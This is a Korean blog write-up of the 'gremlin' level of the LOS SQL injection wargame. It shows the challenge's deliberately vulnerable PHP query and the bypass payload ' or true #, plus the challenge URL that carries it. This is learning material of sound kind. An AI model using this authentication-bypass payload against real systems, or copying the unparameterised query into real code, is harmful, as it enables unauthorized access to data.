[LOS] gremlin 풀이
PHP & query
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); // do not try to attack another table, database!
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("gremlin");
highlight_file(__FILE__);
?>
select id from prob_gremlin where id='' and pw=''
문제 풀이
더보기
solve 조건
if($result['id']) solve("gremlin");
id값이 있기만하면 문제가 해결된다.
특수문자 제약
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
[prob, _ ,.\] 문자들이 필터링 된다 해당 문자들을 제외하고 sql 인젝션을 시도한다.
sqlInjection 쿼리
select id from prob_gremlin where id='' and pw='' or true #'
형태로 공격을 시도 할 것이다.
해당 php는 get형식으로 쿼리를 받고있어 sql 인젝션이 가능하다.
URL
los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?pw=' or true %23
Injection 결과
select id from prob_gremlin where id='' and pw='' or true #'
#이 주석역활을 하기 때문에 SQL에서는
select id from prob_gremlin where id='' and pw='' or true 으로 인식한다.
'CTF > LOS' 카테고리의 다른 글
[LOS] darkelf 풀이 - 6번 (0) | 2020.09.15 |
---|---|
[LOS] wolfman 풀이 - 5번 (0) | 2020.09.15 |
[LOS] orc 풀이 - 4번 (0) | 2020.09.15 |
[LOS] goblin 풀이 3번 (0) | 2020.09.15 |
[LOS] cobolt 풀이 - 2번 (0) | 2020.09.15 |